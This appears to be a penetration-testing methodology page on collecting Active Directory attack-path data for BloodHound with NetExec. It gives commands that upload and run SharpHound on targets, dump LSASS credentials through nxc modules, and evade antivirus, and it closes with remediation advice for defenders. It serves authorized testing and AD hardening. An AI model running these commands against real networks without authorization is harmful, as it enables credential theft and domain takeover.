π‘οΈ Methodology Checklist
- Configure NXC BloodHound sync: edit
~/.nxc/nxc.conf[BloodHound] section - Start Neo4j:
sudo neo4j start - Upload SharpHound:
nxc smb [TARGET] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe - Execute collection:
nxc smb [TARGET] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All" - Download ZIP:
nxc smb [TARGET] -u [USER] -p [PASS] --get-file [ZIP] bloodhound.zip - Import into BloodHound β drag-and-drop
- Run: βShortest Paths to Domain Admins from Owned Principalsβ
- Alternatively: BloodHound.py from Linux if no Windows access
π― Operational Context
Use when: Valid domain credentials available β run BloodHound collection via nxc without transferring SharpHound to the target.
Think Dumber First: nxc ldap [DC] -u [USER] -p [PASS] --bloodhound -ns [DC_IP] -c All β BloodHound data collection directly from nxc without touching the target. Produces zip file ready for BloodHound import.
Skip when: SharpHound already collected from a domain-joined Windows host β Windows collection is more complete than LDAP-only nxc collection.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nano ~/.nxc/nxc.conf | Configure BloodHound Neo4j connection settings |
sudo neo4j start | Ensure Neo4j is running before NXC sync |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe | Upload SharpHound collector to target |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All && dir c:\*_BloodHound.zip" | Execute SharpHound and confirm output |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --get-file [ZIP_FILENAME] bloodhound.zip | Download SharpHound collection results |
nxc smb [TARGET_IP] -u [USER] -p [PASS] | Auto-marks user as owned in BH if BloodHound config is active |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump | Marks all users found in LSASS dump as owned in BloodHound |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M bh_owned -o PASS=[DB_PASS] | Manually mark target COMPUTER node as owned in BloodHound |
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All | BloodHound.py β run from Linux without domain join |
π¬ Deep Dive & Workflow
BloodHound + NXC Configuration
# Edit NXC config to enable BloodHound sync
nano ~/.nxc/nxc.conf
# Add/modify the [BloodHound] section:
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = [YOUR_NEO4J_PASSWORD]
# Verify Neo4j is running:
sudo neo4j start
# β Check: http://localhost:7474
# With this config active, every successful NXC authentication auto-marks
# the compromised user as "Owned" in BloodHoundSharpHound Deployment via NXC
# Download latest SharpHound collector first
wget https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe
# Step 1: Upload to target (must have admin access β (Pwn3d!))
nxc smb [TARGET_IP] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe
# β uploads to C:\SharpHound.exe by default
# Step 2: Execute SharpHound with all collection methods
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All"
# Wait for collection to finish (may take several minutes in large environments)
# Step 3: Confirm output ZIP exists
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "dir c:\*_BloodHound.zip"
# β 20260505103045_BloodHound.zip
# Step 4: Download the ZIP
nxc smb [TARGET_IP] -u [USER] -p [PASS] --get-file "20260505103045_BloodHound.zip" bloodhound.zip
# Step 5: Import into BloodHound GUI
# β Drag-and-drop bloodhound.zip into BloodHound β Upload DataAlternative: BloodHound.py (From Linux)
# No need for Windows target with admin β runs over LDAP/SMB from Linux
# Requires: valid domain credentials + DNS resolution to DC
# Add DC to /etc/hosts
echo "[DC_IP] [DC_FQDN]" >> /etc/hosts
# Run all collection methods
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All
# β Outputs: computers.json, users.json, groups.json, domains.json, gpos.json, ous.json
# Zip and import:
zip bloodhound_data.zip *.json
# β Import into BloodHound GUIAutomatic Owned Sync β Key Behaviors
# Works automatically (user marked owned):
nxc smb [TARGET_IP] -u [USER] -p [PASS] # on (Pwn3d!)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy # all LSASS users
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump # all LSASS users
# Does NOT automatically sync (must use bh_owned module):
--ntds dump # Users from NTDS won't auto-sync
--lsa dump # LSA secrets won't auto-sync
# Manually mark COMPUTER as owned:
nxc smb -M bh_owned --options # see required parameters
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M bh_owned -o PASS=[NEO4J_PASS]BloodHound Key Queries After Collection
-- Shortest path from owned principals to DA:
"Shortest Paths to Domain Admins from Owned Principals"
-- After marking computers/users owned, run:
"Find Shortest Paths to Domain Admins"
"Transitive Object Control" (for ACL chains)
"Users with DCSync Rights"
"Computers with Unconstrained Delegation"
-- Kerberos attack paths:
"Find AS-REP Roastable Users (Owned Principals)"
"Shortest Paths from Kerberoastable Users"Troubleshooting
# Sync fails (authentication error):
# β Check bh_pass in nxc.conf matches CURRENT neo4j password
# β Neo4j default is "neo4j" first login β you set a new password β update nxc.conf
# Neo4j not running:
sudo neo4j start
# β Wait 30 seconds before retrying
# FQDN mapping (BloodHound needs FQDN to match node names):
echo "[DC_IP] dc01.domain.local" >> /etc/hosts
# SharpHound AV detection:
# β If -M procdump or -x "SharpHound.exe" gets flagged:
# β Run BloodHound.py from Linux instead (no binary touches target)
# β Or use older SharpHound version / OPSEC-compiled variantπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc βbloodhound fails | Missing bloodhound module dependency | Install: pip3 install bloodhound; nxc depends on bloodhound Python package |
| BloodHound zip import fails | Version mismatch | nxc uses bloodhound.py compatible format; import into BloodHound 4.x; CE may need different format |
| Collection misses some edges | LDAP-only collection limitation | LDAP collection misses session data; run SharpHound from domain-joined host for session edges |
| nxc bloodhound very slow | Large domain | Use -c DCOnly for faster DC-only collection; skip workstation session data for initial analysis |
| DNS resolution fails during collection | DC hostname not resolving | Add DC to /etc/hosts: [DC_IP] [DC_FQDN]; -ns [DC_IP] flag sets DNS server |
π Reporting Trigger
Finding Title: BloodHound Data Collection Reveals AD Attack Paths Impact: BloodHound graph analysis identifies shortest privilege escalation paths to Domain Admin, exposing ACL chains, Kerberoastable accounts, and delegation vulnerabilities that would require days of manual analysis to discover. Root Cause: Active Directory configuration accumulated attack paths through normal IT operations without periodic security review. Recommendation: Run BloodHound against your own AD environment regularly (quarterly). Remediate identified attack paths starting with shortest paths to Domain Admin. Implement AD tiering model to prevent direct path from user workstations to Domain Admin.